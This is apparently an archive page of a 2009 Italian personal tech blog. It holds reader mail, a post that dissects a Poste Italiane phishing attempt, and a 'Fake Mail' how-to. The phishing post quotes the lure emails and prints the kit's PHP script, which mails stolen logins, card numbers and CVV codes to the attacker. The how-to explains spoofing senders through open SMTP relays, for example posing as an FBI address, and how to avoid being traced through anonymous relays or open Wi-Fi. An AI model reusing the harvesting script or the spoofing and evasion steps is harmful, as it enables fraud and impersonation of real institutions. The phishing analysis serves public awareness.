Arturu.it » mail

Mail sui gestori di pacchetti

arturu — Tue, 29 Sep 2009 14:34:39 +0000

Posted in Linux Mail dei lettori Open Source OS

Come al solito mi sono arrivate alcune mail sull’articolo appena pubblicato: sui gestori di pacchetti. Ci sono alcune precisazioni e novità. Bisogna dire che i gestori di pacchetti non fanno ricerche su internet ma recuperano il software da indirizzi impostati nei repository. I Repository sono delle liste di indirizzi (detto semplicemente) che indicano al gestore dove si trovano i pacchetti da scaricare. Le liste di base con tutto il software ufficiale della distribuzione sono già preimpostate, ma nessuno vieta di inserire nuovi repository con tanti altri programmi aggiuntivi. Come ad esempio seguendo questo link, oppure inserendo nei repository questo sito.

Mail sul caso Phishing

arturu — Tue, 29 Sep 2009 14:02:13 +0000

Posted in Frodi Mail dei lettori

Oggi mi è arrivata una mail dall’amico Pasquale (http://www.grotterianet.com):

Ciao Arturo, sono Pasquale,
a proposito di Phishing che segnali per le poste a me e’ capitato la stessa cosa ma con una banca. Ho provveduto a segnalarlo al Commissariato di PS. Sicuramente lo conosci gia’, secondo me potrebbe essere utile indicarlo anche nell’articolo che hai inserito; evitare che anche uno solo ci caschi e’ gia’ un risultato. In ogni caso ti lascio l’indirizzo http://www.commissariatodips.it/esperto/ … 10. Oppure nella sezione “Sicurezza Telematica” alla voce “Segnalazioni”, per poterlo fare e’ necessario registrasi. Cordiali Saluti da Pasquale.

Ringrazio tantissimo Pasquale per la segnalazione, mi era sfuggito di mente mettere un riferimento al sito del commissariato di Polizia…

Ciao…

PHISHING: Come ti svuoto la carta di credito

arturu — Wed, 16 Sep 2009 21:37:07 +0000

Posted in Frodi Hacking

Quando si parla Phishing la maggior parte delle persone pensa che si stà parlando di bisogni fisiologici oppure i più malizioni pensano subito al mondo dell’erotismo. Il Phishing, è una tecnica di ingegneria sociale, punta a carpire le informazioni riservate di una persona. L’aspetto più tragico delle tecniche di ingnegneria sociale (dato che l’obbietivo sono le informazioni e quindi beni immateriali) è che la vittima difficilmente si accorgerà dell’attacco, a parte quei casi in cui le informazioni sono utilizzate per sottrare beni materiali. Per chi non ne sa niente e volesse approfondire può consultare: Phishing, Ingegneria Sociale.

Ho deciso di parlare di questa tecnica perché stamattina ho subito un tentativo di phishing. Mi è arrivata una mail da Poste Italiane chiedendomi di reinserire i dati del mio conto pena un mancato servizio, logicamente è un tentativo di frode, un modo subdolo per riuscire a carpire i miei dati per rubarmi i miei 20 euri che ho sul conto, cattivone … Ora ti aggiusto io…

Stamattina come al solito vado a controllare la posta. Tra le mail che mi sono arrivate c’erano tre da parte di Poste Italiane. Mi domando “Cosa sarà mai successo. Un cataclisma che incombe su tutto l’universo.”. Poi il contenuto mi ha veramente stupito.

Il contenuto della prima:

Il phishing и una frode informatica, realizzata con l’invio di e-mail contraffatte, inalizzata all’acquisizione, per scopi illegali, di dati riservati.
Gentile Cliente,
nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.

L’inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione.

Per ovviare al problema e necessaria la verifica e l’aggiornamento dei dati relativi all’anaagrafica dell’Intestatario dei servizi Postali. Effetuare l’aggiornamento dei dati cliccando sul seguente collegamento sicuro:

https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp

Cordiali Saluti.

Il contenuto della seconda:

Oggetto: Comunicazione nr. 91219 del 26 Aprile 2007 – Leggere con attenzione

Gentile Cliente,
Nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.

https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp

Cordiali Saluti.

A parte che il mio programma di posta (Thunderbird) mi segnalava la possibilità che fosse una frode c’erano molti motivi per capire subito che si trattava di una frode:

Non vengono mai inviate mail che chiedono di reinserire dati a causa di un errore.
L’indirizzo della pagina a cui si arriva schiacciando sul collegamento indicato porta ad una pagina che è identica a poste.it (una copia perfetta) ad esclusione dell’indirizzo.
Non è un collegamento sicuro (https://) ma solo un collegamento normale (http://)
Disgrazie grammaticali.

Molto incuriosito mi sono messo ad indagare. Clicco su un collegamento, il browser (firefox) mi segnala che il sito a cui stò cercando di collegarmi non è quello originale ma una copia, quindi un tentativo di frode. Tra i collegamenti che ho provato alcuni di questi sono stati rimossi, sicuramente per non lasciare prove (vedi figura sopra a destra), invece uno solo ancora era disponibile (nella figura a sinistra). Da persona abbastanza curiosa mi sono messo in testa di scavare molto più a fondo usando questo collegamento.

Come prima cosa ho chiuso tutti gli avvisi di firefox. Nelle caselle dove mi chiedeva “Nome utente” e “Password” ho messo dati fasulli (una valanga di volgarità ). Appena premuto su “Esegui” un’altra schermata simile al sito di poste.it mi chiedeva i dati della carta postepay e qui un’altra valanga di dati falsi (vedi figura a sinistra, è presente anche la funzione che calcola il numero di caratteri inseriti), appena cliccato su “vai” come per magia mi fa arrivare alla vera home page di poste.it, naturalmente per non destare sospetti.

La prima cosa che mi viene da fare è controllare a chi appartiene il sito consultando alcuni database whois come ad esemprio il ripe, però niente. Strano. La società che ha registrato il dominio non ha inserito i dati dell’utente.

Ancora non contento mi sono messo a smanettare con gli indirizzi e arrivo a quello indicato nella figura accanto. Con grandissima sorpresa mi accorgo che il nostro grandissimo e meraviglioso truffatore ha dimostrato che è un emerito imbecille oltre che un ignorate (visti gli orrori grammaticali). Infatti il nostro “eroe” ha lasciato sul server il file .zip in cui erano contenuti i file per poter copiare il sito di poste.it e farsi inviare tramite mail i dati (una copia l’ho salvata qui). Tra i file c’era uno “session.php”:

session_start();
$USER = $_SESSION['USER'];
$PASS = $_SESSION['PASS'];
$CC = $_POST['CC'];
$MONTH = $_POST['EM'];
$YEAR = $_POST['EY'];
$CVV = $_POST['CVV2'];

$ip = getenv(“REMOTE_ADDR”);
$adddate=date(“D M d, Y g:i a”);

$subj = “$USER : $PASS __ $CC $MONTH/$YEAR $CVV “;
$msg = “

Poste IT

User : $USER
Pass : $PASS

Card Number : $CC
Expiration Date ( mm/yy ) : $MONTH/$YEAR
CVV2 : $CVV

“;

mail(” email@domain.com “, $subj, $msg);
header(“Location: complete.html”);

La cosa interessante è che i dati delle persone truffate vengono inviate alla casella: ” email@domain.com “.

Come prima cosa vado a vedere l’indirizzo http://www.domain.com, sembra il sito di un maintener (società che forniscono dei servizi ai webmaster: registrazione domini, hosting, using, server virtuali, ecc). Interrogo dinuovo il database e:

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

%ERROR:101: no entries found
%
% No entries found in the selected source(s).

Nessuna informazione in merito. Purtroppo sono costretto a fermarmi qui. Da qui in avanti solo la Polizia Postale ha l’autorità giuridica a procedere.

Una piccola osservazione. Meno male che utilizzo Mozilla Firefox e Thunderbird altrimenti potevo cadere nell’inganno. State attenti alle facciate a volte nascondono qualcosa di brutto…

Fake Mail

arturu — Wed, 16 Sep 2009 21:02:34 +0000

Posted in Hacking

Questo è il mio primo articolo in questa categoria, ho deciso di parlare di una tecnica vecchia quanto internet e che ancora è molto efficace. L’argomento di questo articolo sarà: “Fake Mail” ovvero come mandare una mail con l’indirizzo che vogliamo, cioè far in modo che chi riceve la mail (destinatario) visualizzi come mittente quello che abbiamo impostato noi…

La tecnica è banale, non serve conoscere nessun linguaggio di programmazione, non serve avere alcun software in particolare; bisogna solo capire come funziona l’invio e la ricezione della posta. Attualmente esistono due metodi per ricevere e mandare posta:

L’interfaccia web: uno va sul sito (ad es libero.it) inserisce username e password e arriva direttamente nella casella di posta dove sono contenute le mail. In questo modo l’utente non dovrà fare nessuna impostazione sul suo computer e non si accorge di tutti i passaggi intermedi;
Tramite il client di posta che può essere Mozilla Thunderbird (penso uno dei migliori), kmail, Eudora, Outlook Espress, ecc. Il programma di posta và configurato in modo che si possa collegare sulla nostra casella di posta, praticamente gli si deve dire da dove recuperare le mail e come deve fare per poterle inviare. Per questo motivo i server di posta mettono a disposizione dei servizi (nel gergo vengono chiamati “demoni” o col nome generico server, preferisco non usare quest’ultimo termine per i servizi in quando potrebbe creare confusione) uno per poter inviare la posta e un’altro per poterla ricevere. Il demone, più usato, per poter scaricare la posta dal sito sul proprio computer si chiama “pop” (ad es. pop.libero.it), invece il demone per l’invio della posta si chiama “smtp” (ad es. smtp.libero.it). Impostati questi due parametri si può inviare e ricevere la posta tranquillamente.

In questo articolo ci soffermeremo sul secondo metodo perchè l’intoppo stà proprio là. Il programma di posta e i demoni dialogano tramite dei comandi testuali che non sono criptati, inoltre solo il demone pop ha bisogno dell’username e password per poter funzionare; da questo si capisce che chiunque può usare il demone smtp a proprio piacimento. L’utilizzo a questo punto è banalissimo: se il demone smtp accetta qualsiasi cosa come se fosse vera noi possiamo impostare il nostro client di posta con un account inventato da noi (ad es. admin@fbi.gov ) come server pop possiamo lasciare in bianco o mettere uno a caso e come server smtp mettiamo uno qualsiasi (una lista si può trovare qui). Quando dobbiamo mandare la nostra “fake mail” scegliamo come mittente il nostro account finto. Bisogna precisare che funziona solo con l’invio della posta e non con la ricezione in quanto il server pop richiede username e password per poter funzionare.

Per chi ancora non avesse capito faccio un esempio elementare: siamo nel mondo reale la cassetta postale del Sign. Rossi la chiamiamo “pop”, naturalmente solo il Sign. Rossi può aprire la propria pop perchè è l’unico a possedere le chiavi; invece quando il Sign. Rossi deve inviare una lettera si reca alla buca delle lettere del servizio postale che chiameremo “smtp”, naturalmente non servono le chiavi dato che è una buca delle lettere pubblica. Il Sign. Rossi è un furbacchione e vuole fare uno scherzo ad un suo amico, come mittente della lettera scrive “Presidente della repubblica” si reca alla smtp vicina e l’imbuca.

Bisogna considerare una cosa però: ogni volta che colleghiamo il computer ad internet viene assegnato un indirizzo univoco che viene usato per poter comunicare. Questo indirizzo viene anche memorizzato dai demoni smtp sulla nostra “fake mail”, quindi è molto rischioso fare queste operazioni con la nostra connessione. Ci sono un sacco di metodi per ovviare a questi inconvenienti, dall’utilizzo di demoni smtp anonimi sparsi per il mondo, all’utilizzo di connessioni anonime, oppure dagli internet point o dalle reti wireless aperte.